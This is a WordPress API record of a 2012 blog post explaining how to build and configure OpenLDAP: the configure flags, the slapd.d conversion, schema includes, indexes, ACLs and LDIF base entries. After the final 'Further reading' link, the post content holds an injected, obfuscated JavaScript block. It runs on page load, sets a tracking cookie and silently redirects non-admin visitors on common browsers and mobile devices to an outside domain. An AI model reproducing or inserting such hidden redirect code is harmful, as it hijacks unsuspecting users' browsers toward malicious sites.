{"id":28,"date":"2012-02-13T17:20:39","date_gmt":"2012-02-13T09:20:39","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=28"},"modified":"2012-02-15T14:40:25","modified_gmt":"2012-02-15T06:40:25","slug":"openldap-building-and-configuration","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/02\/13\/openldap-building-and-configuration\/","title":{"rendered":"openldap building and configuration"},"content":{"rendered":"<p>Try to config an openldap (2.4.29) as nss backend &amp; pam backend for Linux, NIS replacement, as well as SAMBA PDC.<br \/>\n<!--more--><\/p>\n<h1>Building &amp; Installation<\/h1>\n<pre>.\/configure --prefix=\/usr\/local\/openldap --enable-modules --enable-overlays=mod --enable-crypt\r\nmake depend\r\nmake\r\nmake install<\/pre>\n<h1>Configuration<\/h1>\n<h2>slapd.d &amp; slapd.conf<\/h2>\n<p>The configuration of openldap has changed to completely stored in ldap itself, under the cn=config.\u00a0 The best way to have a quick start to adopt the new configuration change is convert the slapd.conf to ldif config entries under slapd.d directory.<\/p>\n<pre>&gt; slaptest -f slapd.conf -F slapd.d<\/pre>\n<p>In case, you would like to access cn=config tree thru ldapsearch or other ldap browser client, you need to assign the olcRootDN &amp; olcRootPW to the cn=config backend.<\/p>\n<ul>\n<li>open your slapd.d\/cn=config\/olcDatabase={0}config.ldif<\/li>\n<li>insert olcRootDN: cn=Manager,cn=config<\/li>\n<li>insert olcRootPW and it&#8217;s password value<\/li>\n<\/ul>\n<p>(ref: <a title=\"doing OpenLDAP config changes in RHEL 6\" href=\"http:\/\/unix.stackexchange.com\/questions\/16092\/doing-openldap-config-changes-in-rhel-6\/16102#16102\" target=\"_blank\">doing OpenLDAP config changes in RHEL 6<\/a>)<\/p>\n<h2>db backend<\/h2>\n<pre>database        bdb\r\nsuffix          \"dc=xyz,dc=xxx\"\r\nrootdn          \"cn=Manager,dc=xyz,dc=xxx\"\r\nrootpw          {SSHA}xxyyzzddeeffgghhiijjkkll<\/pre>\n<h2>Schema<\/h2>\n<pre>include         \/usr\/local\/openldap\/etc\/openldap\/schema\/core.schema\r\ninclude         \/usr\/local\/openldap\/etc\/openldap\/schema\/cosine.schema\r\ninclude         \/usr\/local\/openldap\/etc\/openldap\/schema\/nis.schema<\/pre>\n<p>In case you would like to add it into cn=config, you may<\/p>\n<pre>&gt; ldapadd -h localhost -x -D 'cn=Manager,cn=config' -W -f cosine.ldif\r\n&gt; ldapadd -h localhost -x -D 'cn=Manager,cn=config' -W -f nis.ldif<\/pre>\n<p>where cosine.ldif &amp; nis.ldif are included in the openldap.<\/p>\n<h2>Index<\/h2>\n<pre>index   objectClass     eq,pres\r\nindex   cn,uid,mail        pres,eq,sub<\/pre>\n<h2>ACL<\/h2>\n<pre>dn: olcDatabase={1}bdb,cn=config\r\nolcAccess: {0}to * by self write by * read<\/pre>\n<h2>Setup using slapd.d<\/h2>\n<p>Convert the slapd.conf to slapd.d<\/p>\n<pre>&gt; slaptest -f slapd.conf -F slapd.d<\/pre>\n<h2>The 1st base entry<\/h2>\n<pre>&gt; ldapmodify -h localhost -D 'cn=Manager,dc=xyz,dc=xxx' -w password -x\r\ndn: dc=xyz, dc=xxx\r\nchangetype: add\r\nobjectclass: top\r\nobjectclass: dcObject\r\nobjectclass: organization\r\ndc: xyz\r\no: xyz company<\/pre>\n<h2>The whole DIT<\/h2>\n<pre>dn: dc=xyz,dc=xxx\r\nchangetype: add\r\nobjectclass: top\r\nobjectclass: dcObject\r\nobjectclass: organization\r\ndc: xyz\r\no: xyz.xxx Inc\r\n\r\ndn: ou=group,dc=xyz,dc=xxx\r\nchangetype: add\r\nobjectclass: organizationalunit\r\nou: group\r\ndescription: generic groups branch\r\n\r\ndn: ou=people,dc=xyz,dc=xxx\r\nchangetype: add\r\nobjectclass: organizationalunit\r\nou: people\r\ndescription: generic people branch<\/pre>\n<p>Further reading: <a title=\"Configuring OpenLDAP as a replacement for NIS\" href=\"http:\/\/www.q-station.net\/kb\/index.php\/2012\/02\/15\/configuring-openldap-as-a-replacement-for-nis\/\">Configuring OpenLDAP as a replacement for NIS<\/a><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Try to config an openldap (2.4.29) as nss backend &amp; pam backend for Linux, NIS replacement, as well as SAMBA PDC.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[3,8],"tags":[11,9,12,10],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/28"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=28"}],"version-history":[{"count":27,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/28\/revisions"}],"predecessor-version":[{"id":51,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/28\/revisions\/51"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=28"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=28"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=28"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}